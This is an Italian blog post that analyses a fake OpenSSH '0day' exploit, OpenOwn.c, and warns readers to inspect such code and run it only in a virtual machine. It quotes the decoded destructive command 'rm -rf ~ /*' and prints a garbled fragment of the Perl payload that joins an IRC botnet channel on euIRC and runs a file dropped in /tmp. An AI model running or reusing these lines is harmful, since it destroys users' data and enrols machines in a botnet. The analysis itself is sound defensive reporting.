VoIP and Hacking

Ho scoperto che il falso exploit open-ssh “0day” apparso magicamente pochi giorni fa, e di cui ho già parlato qui, aveva già fatto la sua apparizione a metà luglio 2009 col nome di OpenOwn.c.

Esattamente come la sua reincarnazione, il falso exploit comprendeva tre stringhe di codice offuscato, definite come jmpcode[], shellcode[] ed fbsd_shellcode[].

Come già stabilito, jmpcode[] non è altro che una rappresentazione esadecimale di “rm -rf ~ /* 2> /dev/null &”, comando destinato a cancellare l’intero contenuto della home directory o, nel peggiore dei casi, della root directory, nel caso in cui venisse eseguito coi privilegi di root.

shellcode[] ed fbsd_shellcode[] aprono invece una connessione verso euIRC, un network di Internet Relay Chat, aggregandosi ad un canale “key-protected”, in definitiva arruolandosi in una botnet, come si puo arguire ad esempio dalla porzione di codice seguente:

#!/usr/bin/perl
$chan="#cn";$key ="fags";$nick="phpfr";$server="irc.ham.de.euirc.net";$SIG{TERM}d +x /tmp/hi 2>/dev/null;/tmp/hi";

Il falso exploit remoto (ma autenticissimo exploit locale!) era stato attribuito al famigerato anti-sec group, con l’obiettivo di fare strage di script kiddies sempre alla ricerca di un nuovo exploit, e magari di colpire anche qualche ricercatore troppo rilassato.

Di sicuro la sua ricomparsa è una buona occasione per ribadire quella che dovrebbe essere una procedure standard, almeno riguardo a software di questo tipo: ispezionare sempre il codice prima di mandarlo in esecuzione, e farlo quindi in un ambiente circoscritto e controllato, tipo una virtual machine.

Send post as PDF to